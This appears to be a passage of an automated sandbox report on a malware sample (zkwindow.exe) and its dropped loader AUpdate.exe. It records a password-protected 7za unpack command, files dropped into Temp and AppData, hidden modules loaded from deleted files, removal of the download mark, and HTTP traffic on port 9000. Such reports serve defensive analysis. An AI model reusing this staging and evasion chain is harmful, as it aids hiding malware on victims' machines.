                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: netapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: isscint.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: iscmplr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: msimg32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: dbghelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: pla.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: pdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: tdh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: cabinet.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: wevtapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: shdocvw.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                            Source: zkwindow.exeStatic PE information: Image base 0x140000000 > 0x60000000
                            Source: zkwindow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                            Source: zkwindow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                            Source: zkwindow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                            Source: zkwindow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: zkwindow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                            Source: zkwindow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                            Source: zkwindow.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                            Source: zkwindow.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                            Source: Binary string: F:\scintilla\bin\Scintilla.pdb source: AUpdate.exe, 0000000B.00000002.1620913384.0000000001636000.00000002.00000001.01000000.0000000A.sdmp, isscint.dll.9.dr
                            Source: Binary string: wntdll.pdbUGP source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
                            Source: Binary string: wntdll.pdb source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
                            Source: zkwindow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                            Source: zkwindow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                            Source: zkwindow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                            Source: zkwindow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                            Source: zkwindow.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                            Data Obfuscation

                            barindex
                            Obfuscated command line found
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\7zip\7za.exe "C:\Users\user\AppData\Local\Temp\7zip\7za.exe" x "C:\Users\user\AppData\Local\Temp\fe387de893ce4f2ca49f16029d364dc1" -o"C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47" -p5478fhjdDSHJHDSJFHJSD#@$@$%^#$%WDF! -y Jump to behavior
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013C8B50 _invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,SleepEx,FreeLibrary,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,LoadLibraryA,GetProcAddress,CreateProcessA,FreeLibrary,_invalid_parameter_noinfo_noreturn,Concurrency::cancel_current_task,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,0_2_00007FF7013C8B50
                            Source: vpdcuvm.16.drStatic PE information: real checksum: 0x0 should be: 0xc3233
                            Source: bmrmmwsgmayisp.12.drStatic PE information: real checksum: 0x0 should be: 0xc3233
                            Source: ISCmplr.dll.11.drStatic PE information: real checksum: 0x19db1b should be: 0x19cdc9
                            Source: ISCmplr.dll.9.drStatic PE information: real checksum: 0x19db1b should be: 0x19cdc9
                            Source: 7za.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x1472ac
                            Source: zkwindow.exeStatic PE information: real checksum: 0x0 should be: 0x3b003
                            Source: zkwindow.exeStatic PE information: section name: .fptable
                            Source: AUpdate.exe.9.drStatic PE information: section name: .didata
                            Source: ISCmplr.dll.9.drStatic PE information: section name: .didata
                            Source: ISCmplr.dll.11.drStatic PE information: section name: .didata
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013DB784 push rsp; ret 0_2_00007FF7013DB785
                            Source: C:\Users\user\Desktop\zkwindow.exeCode function: 0_2_00007FF7013DB78F push rcx; ret 0_2_00007FF7013DB790
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC3D8F5338 pushad ; retn 3DBBh1_2_00007FFC3D8FAEE9
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC3D8E749E push eax; iretd 1_2_00007FFC3D8E74AD
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC3D8E5FED push ebx; ret 1_2_00007FFC3D8E5FFA
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC3D8E8169 push ebx; ret 1_2_00007FFC3D8E816A
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC3D8E746E pushad ; iretd 1_2_00007FFC3D8E749D
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFC3D8E43A5 push edi; iretd 1_2_00007FFC3D8E43A6
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeCode function: 9_2_0091368A push rcx; ret 9_2_0091368B
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00D77000 push 00D770DEh; ret 11_2_00D770D6
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C680E0 push ecx; mov dword ptr [esp], edx11_2_00C680E2
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C960A8 push ecx; mov dword ptr [esp], eax11_2_00C960AA
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C98240 push ecx; mov dword ptr [esp], edx11_2_00C98241
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00CE6264 push ecx; mov dword ptr [esp], edx11_2_00CE6265
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00CE4348 push ecx; mov dword ptr [esp], edx11_2_00CE4349
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00CE44A0 push ecx; mov dword ptr [esp], edx11_2_00CE44A1
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C964B0 push ecx; mov dword ptr [esp], edx11_2_00C964B1
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C68450 push ecx; mov dword ptr [esp], edx11_2_00C68452
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C4C460 push ecx; mov dword ptr [esp], eax11_2_00C4C465
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00CE05D8 push ecx; mov dword ptr [esp], edx11_2_00CE05D9
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C9659C push ecx; mov dword ptr [esp], ecx11_2_00C965A1
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00CE6598 push ecx; mov dword ptr [esp], edx11_2_00CE6599
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C96548 push ecx; mov dword ptr [esp], ecx11_2_00C9654C
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C9854C push ecx; mov dword ptr [esp], edx11_2_00C9854D
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C966A4 push ecx; mov dword ptr [esp], ecx11_2_00C966A9
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C9461C push ecx; mov dword ptr [esp], eax11_2_00C9461D
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C96620 push ecx; mov dword ptr [esp], ecx11_2_00C96625
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C5E7D0 push ecx; mov dword ptr [esp], ecx11_2_00C5E7D3
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C5E7F4 push ecx; mov dword ptr [esp], ecx11_2_00C5E7F7
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00C5C7A8 push ecx; mov dword ptr [esp], ecx11_2_00C5C7AC
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeCode function: 11_2_00CE2704 push ecx; mov dword ptr [esp], ecx11_2_00CE2709
                            Source: bmrmmwsgmayisp.12.drStatic PE information: section name: .text entropy: 6.939591378361454
                            Source: vpdcuvm.16.drStatic PE information: section name: .text entropy: 6.939591378361454
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeFile created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\isscint.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeFile created: C:\Users\user\AppData\Roaming\DH_Http\ISCmplr.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayispJump to dropped file
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\7zip\7za.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeFile created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exeFile created: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\ISCmplr.dllJump to dropped file
                            Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exeFile created: C:\Users\user\AppData\Roaming\DH_Http\isscint.dllJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\vpdcuvmJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayispJump to dropped file
                            Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\vpdcuvmJump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Found hidden mapped module (file has been removed from disk)
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\BMRMMWSGMAYISP
                            Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\VPDCUVM
                            Hides that the sample has been downloaded from the Internet (zone.identifier)
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe:Zone.Identifier read attributes | deleteJump to behavior
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Uses known network protocols on non-standard ports
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49727
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49728
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49729
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49730
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49731
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49732
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49733
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49734
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49735
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49736
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49737
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49738
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49739
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49740
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49741
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49742
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49743
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49744
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49745
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49746
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49747
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49748
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49749
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49750
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49751
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49752
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49753
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49754
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49755
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49756
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49757
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49758
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49759
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49760
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49761
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49762
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49763
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49764
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49765
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49766
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49767
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49768
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49769
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49770
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49771
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49772
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49773
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49774
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49775
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49776
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49777
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49778
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49779
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49780
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49781
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49782
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49783
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49784
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49785
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49786
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49787
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49788
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49789
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49790
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49791
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49792
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49793
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49794
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49795
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49796
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49797
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49797
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49798
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 9000
                            Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49799
